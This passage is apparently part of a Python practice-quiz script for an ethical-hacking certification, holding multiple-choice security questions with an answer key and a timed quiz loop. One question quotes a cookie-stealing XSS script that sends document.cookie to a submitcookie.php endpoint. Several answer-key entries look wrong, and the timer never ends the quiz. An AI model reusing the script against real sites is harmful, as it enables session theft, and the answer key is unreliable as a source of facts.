    ("Which of the following is a vulnerability in which the malicious person forces the user's browser to send an authenticated request to a server?", "Cross-site request forgery", ["Cross-site request forgery", "Cross-site scripting", "Server-side request forgery", "Session hijacking"]),
    ("The attacker created a fake account on a dating site and wrote to John with an offer to get acquainted. Fake profile photos enthralled John, and he initiated a conversation with the attacker's fake account. After a few hours of communication, the attacker began asking about his company and eventually gathered all the essential information about the target company. What is the social engineering technique the attacker used in this scenario?", "Honey trap", ["Baiting", "Piggybacking", "Honey trap", "Diversion theft"]),
    ("Which of the following encryption algorithms is a symmetric key block cipher that has a 128-bit block size, and its key size can be up to 256 bits?", "Twofish", ["Twofish", "HMAC", "Blowfish", "IDEA"]),
    ("All the industrial control systems of your organization are connected to the Internet. Your management wants to empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption. You have been assigned to find and install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools will you use to accomplish this task?", "Flowmon", ["Robotium", "IntentFuzzer", "BalenaCloud", "Flowmon"]),
    ("Based on this log, which of the following is true?", "Application is SSH and 10.240.212.18 is the client and 10.202.206.19 is the server.", ["SSH communications are encrypted; it's impossible to know who is the client or the server.", "Application is FTP and 10.240.212.18 is the client and 10.202.206.19 is the server.", "Application is SSH and 10.240.212.18 is the server and 10.202.206.19 is the client.", "Application is SSH and 10.240.212.18 is the client and 10.202.206.19 is the server."]),
    ("Identify the attack by description: When performing this attack, an attacker installs a fake communication tower between two authentic endpoints to mislead a victim. He uses this virtual tower to interrupt the data transmission between the user and the real tower, attempting to hijack an active session. After that, the attacker receives the user's request and can manipulate the virtual tower traffic and redirect a victim to a malicious website.", "aLTEr attack", ["Jamming signal attack", "aLTEr attack", "KRACK attack", "Wardriving"]),
    ("Your boss informed you that a problem was detected in the service running on port 389 and said that you must fix this problem as soon as possible. What service is running on this port, and how can you fix this problem?", "The service is LDAP. You must change it to 636, which is LDAPS.", ["The service is LDAP. You must change it to 636, which is LDAPS.", "The findings do not require immediate actions and are only suggestions.", "The service is NTP, and you have to change it from UDP to TCP to encrypt it.", "The service is SMTP, and you must change it to SMIME, which is an encrypted way to send emails."]),
    ("The attacker plans to compromise the systems of organizations by sending malicious emails. He decides to use the tool to track the target's emails and collect information such as senders' identities, mail servers, sender IP addresses, and sender locations from different public sources. It also checks email addresses for leaks using haveibeenpwned.com API. Which of the following tools is used by the attacker?", "Infoga", ["Infoga", "Netcraft", "ZoomInfo", "Factiva"]),
    ("The attacker is performing the footprinting process. He checks publicly available information about the target organization by using the Google search engine. Which of the following advanced operators will he use to restrict the search to the organization’s web domain?", "[site:]", ["[link:]", "[site:]", "[location:]", "[allinurl:]"]),
    ("Justin, the evil hacker, wants to steal Joanna's data. He sends Joanna an email with a malicious link that looks legitimate. Joanna unknowingly clicks on the link, and it redirects her to a malicious web page, and John steals Joanna's data. Which of the following attacks is described in this scenario?", "Phishing", ["Vishing", "Phishing", "Spoofing", "DDoS"]),
    ("While checking your organization's wireless network, you found that the wireless network component is not sufficiently secure. It uses an old encryption protocol designed to mimic wired encryption. Which of the following protocols is used in your organization's wireless network?", "WEP", ["WEP", "WPA3", "RADIUS", "WPA"]),
    ("Which of the following is a cloud solution option where a customer can join with a group of users or organizations to share a cloud environment?", "Community", ["Private", "Hybrid", "Community", "Public"]),
    ("Matthew successfully hacked the server and got root privileges. Now he wants to pivot and stealthy transit the traffic over the network, avoiding the IDS. Which of the following will be the best solution for Matthew?", "Install Cryptcat and encrypt outgoing packets from this server.", ["Use Alternate Data Streams to hide the outgoing packets from this server.", "Install Cryptcat and encrypt outgoing packets from this server.", "Install and use Telnet to encrypt all outgoing traffic from this server.", "Use HTTP so that all traffic can be routed vis a browser, thus evading the internal Intrusion Detection Systems."]),
    ("Which of the following methods can keep your wireless network undiscoverable and accessible only to those that know it?", "Disable SSID broadcasting", ["Lock all users", "Delete the wireless network", "Disable SSID broadcasting", "Remove all passwords"]),
    ("Which of the following is a piece of hardware on a motherboard that generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is impossible?", "TPM", ["CPU", "GPU", "TPM", "UEFI"]),
    ("Which of the following types of attack (that can use either HTTP GET or HTTP POST) allows an attacker to induce users to perform actions that they do not intend to perform?", "Cross-Site Request Forgery", ["Browser Hacking", "Cross-Site Scripting", "Cross-Site Request Forgery", "SQL Injection"]),
    ("Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?", "Out-of-band SQLi", ["Union-based SQLi", "Time-based blind SQLi", "Out-of-band SQLi", "In-band SQLi"]),
    ("As usual, you want to open your online banking from your home computer. You enter the URL www.yourbanksite.com into your browser. The website is displayed and prompts you to re-enter your credentials as if you have never visited the site before. You decide to check the URL of the website and notice that the site is not secure and the web address appears different. Which of the following types of attacks have you been exposed to?", "DNS hijacking", ["ARP cache poisoning", "DHCP spoofing", "DoS attack", "DNS hijacking"]),
    ("The medical company has recently experienced security breaches. After this incident, their patients' personal medical records became available online and easily found using Google. Which of the following standards has the medical organization violated?", "HIPAA/PHI", ["HIPAA/PHI", "PII", "ISO 2002", "PCI DSS"]),
    ("Which of the following type of viruses avoid detection changing their own code, and then cipher itself multiple times as it replicates?", "Stealth virus", ["Tunneling virus", "Encryption virus", "Cavity virus", "Stealth virus"]),
    ("Which of the following algorithms uses a 64-bit block size that is encrypted three times with 56-bit keys?", "Triple DES", ["AES", "Triple DES", "DES", "IDEA"]),
    ("Your organization is implementing a vulnerability management program to evaluate and control the risks and vulnerabilities in IT infrastructure. At the moment, your security department is in the vulnerability management lifecycle phase in which is executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which of the following vulnerability-management phases is your security department in?", "Remediation", ["Verification", "Remediation", "Risk assessment", "Vulnerability scan"]),
    ("You have discovered that someone is posting strange images without comments on your forum. You decide to check it out and discover the following code is hidden behind those images: 1. <script> 2. document.write(\"<img.src='https://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '\" />'); 3. </script> What does this script do?", "This PHP file silently executes the code and grabs the user's session cookie and session ID.", ["This PHP file silently executes the code and grabs the user's session cookie and session ID.", "The code is a virus that is attempting to gather the user's username and password.", "The code injects a new cookie into the browser.", "The code redirects the user to another site."]),
    ("Your organization conducts a vulnerability assessment for mitigating threats. Your task is to scan the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as a web server, an email server or a database server. After this, you will need to select the vulnerabilities on each machine and start executing only the relevant tests. Which of the following type of vulnerability assessment solutions will you perform?", "Inference-based assessment", ["Inference-based assessment", "Tree-based assessment", "Service-based solutions", "Product-based solutions"]),
    ("What of the following is a file which is the rich target to discover the structure of a website during web-server footprinting?", "Robots.txt", ["Robots.txt", "Document root", "index.html", "domain.txt"])
]

print("""\n .d8888b.  8888888888 888    888      888b     d888  .d88888b.   .d8888b.  888    d8P  
d88P  Y88b 888        888    888      8888b   d8888 d88P" "Y88b d88P  Y88b 888   d8P   
888    888 888        888    888      88888b.d88888 888     888 888    888 888  d8P    
888        8888888    8888888888      888Y88888P888 888     888 888        888d88K     
888        888        888    888      888 Y888P 888 888     888 888        8888888b    
888    888 888        888    888      888  Y8P  888 888     888 888    888 888  Y88b   
Y88b  d88P 888        888    888      888   "   888 Y88b. .d88P Y88b  d88P 888   Y88b  
 "Y8888P"  8888888888 888    888      888       888  "Y88888P"   "Y8888P"  888    Y88b \n\n""")

def choose_questions(pool, num_questions=125):
    return random.sample(pool, num_questions)

def ask_question(question, correct_answer, options):
    print(question)
    for i, option in enumerate(options, start=1):
        print(f"{Fore.CYAN}{i}. {option}{Style.RESET_ALL}")  
    answer = input("Your answer (number): ")
    if options[int(answer)-1] == correct_answer:
        print(f"{Fore.GREEN}Correct!{Style.RESET_ALL}")  
        return True
    else:
        print(f"{Fore.RED}Wrong! The correct answer was: {correct_answer}{Style.RESET_ALL}")  
        return False

def run_quiz():
    score = 0

    selected_questions = choose_questions(question_pool, min(125, len(question_pool)))


    for question, correct_answer, options in selected_questions:
        if ask_question(question, correct_answer, options):
            score += 1
        print()

    print(f"Quiz completed! Your score is {score} out of {len(selected_questions)}")
    print(f"Your percentage is {(score / len(selected_questions)) * 100:.2f}%")
    print(f"Press Ctrl + C to Exit")

def timer(seconds):
    for _ in range(seconds):
        mins, secs = divmod(seconds, 60)
        hours, mins = divmod(mins, 60)
        time_format = '{:02d}:{:02d}:{:02d}'.format(hours, mins, secs)
       
        time.sleep(1)
        seconds -= 1
    print("\nTime's up! The quiz will now end.")

def main():
    quiz_duration = 14400  
    quiz_thread = Thread(target=run_quiz)
    timer_thread = Thread(target=timer, args=(quiz_duration,))

    timer_thread.start()
    quiz_thread.start()

    quiz_thread.join()
    if quiz_thread.is_alive():
        print("You didn't finish in time!")

if __name__ == "__main__":
    main()

